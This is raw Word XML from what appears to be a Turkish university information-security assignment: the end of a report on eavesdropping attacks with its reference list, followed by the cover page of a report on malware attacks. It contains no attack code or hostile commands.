          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>XSS açıklarına dikkat etmelisiniz.</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ab/>
        <w:t>Spoofing ile cihazınıza veya kullandığınız bir siteye kök işlem saldırısı yapabilirler ve bu işlem çalışma performansını vs hiçbir şekilde etkilemediği için siz bunun farkına dahi varamayabilirsiniz. Bundan dolayı yukarıdaki maddelere özen göstererek eavesdropping saldırı türlerinden uzak kalabilirsiniz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>KAYNAKLAR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="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 xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="0016347E">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
          </w:rPr>
          <w:t>https://www.cozumpark.com/bilgi-g-venli-i-ve-genel-g-venlik-kavramlar-b-l-m-2/</w:t>
        </w:r>
      </w:hyperlink>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 xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="0016347E">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
          </w:rPr>
          <w:t>https://www.techopedia.com/definition/13612/eavesdropping</w:t>
        </w:r>
      </w:hyperlink>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color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="0016347E">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
          </w:rPr>
          <w:t>https://www.dogukankaradag.com/eavesdropping-attack-ile-desifre-olmak/</w:t>
        </w:r>
      </w:hyperlink>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i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">[4] Gürol CANBEK, Şeref SAĞIROĞLU (2007). </w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>BİLGİSAYAR SİSTEMLERİNE YAPILAN SALDIRILAR VE TÜRLERİ: BİR İNCELEME</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">[5] Merve YÜKSEL, Nihat ÖZTÜRK (2017). </w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">SIP Saldırıları ve Güvenlik Yöntemleri </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rStyle w:val="title-text"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Z Zhang, Z Man, Y Li (2004). </w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rStyle w:val="title-text"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Improving Wójcik's eavesdropping attack on the ping–pong protocol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0083764B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rStyle w:val="title-text"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0083764B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:spacing w:before="0" w:after="60"/>
        <w:ind w:right="240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rStyle w:val="nowrap"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Henning Weier</w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rStyle w:val="nowrap"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Harald Krauss</w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rStyle w:val="nowrap"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Markus Rau</w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rStyle w:val="nowrap"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Martin Fürst</w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rStyle w:val="nowrap"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Sebastian Nauerth</w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rStyle w:val="nowrap"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and </w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rStyle w:val="nowrap"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Harald Weinfurter (2011). </w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Quantum eavesdropping without interception: an attack exploiting the dead time of single-photon detectors</w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0083764B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0083764B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rStyle w:val="authors-info"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">F. Maggi, Alberto Volpatto, Simone Gasparini, Giacomo Boracchi, Stefano Zanero (2011). </w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A fast eavesdropping attack against touchscreens</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0083764B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0083764B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[9] İzzet Gökhan ÖZBİLGİN (2003). </w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BİLGİ TEKNOLOJİLERİ DENETİMİ VE ULUSLARARASI STANDARTLAR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0083764B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[10] Mustafa GÜLMÜŞ (2011). </w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Kurumsal bilgi güvenliği yönetim sistemleri ve güvenliği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0083764B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[11] Emine TUĞ İLÇİN, Ş. Feyza ADAK, Hüseyin ÇAKIR (2012). </w:t>
      </w:r>
      <w:r w:rsidRPr="0083764B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bilişim Güvenliği Tedbirleri ve TKDK Kurumunda Uygulama Örneği</w:t>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Pr="00893E2A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="TBal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95363">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68EE2EB7" wp14:editId="14830218">
            <wp:extent cx="2282190" cy="2250440"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="9" name="Resim 9" descr="atau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uni ile ilgili gÃ¶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90" cy="2250440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ATATÜRK ÜNİVERSİTESİ MÜHENDİSLİK FAKÜLTESİ BİLGİSAYAR MÜHENDİSLİĞİ BÖLÜMÜ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BMS-302-50-50 BİLGİSAYAR – BİLGİ GÜVENLİĞİ VE YÖNETİMİ</w:t>
      </w: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Adı ve Soyadı : Muhammed Aziz KURT</w:t>
      </w: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Fakülte No : 130757009</w:t>
      </w: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Öğretim Görevlisi’nin Adı:  Prof. Dr. Abdulsamet HAŞILOĞLU</w:t>
      </w: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 xml:space="preserve">Section 1.3.1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A95363">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Biometric Identification</w:t>
      </w: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 xml:space="preserve">Section 1.3.2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A95363">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Single Sign-On for the Enterprise</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>Araştırma Konusu: Kötü Amaçlı Yazılım Saldırısı</w:t>
      </w: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sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:id w:val="368654976"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="TBal"/>
          </w:pPr>
          <w:r>
            <w:t>İçindekiler</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T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9979158" w:history="1">
            <w:r w:rsidRPr="00792A20">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
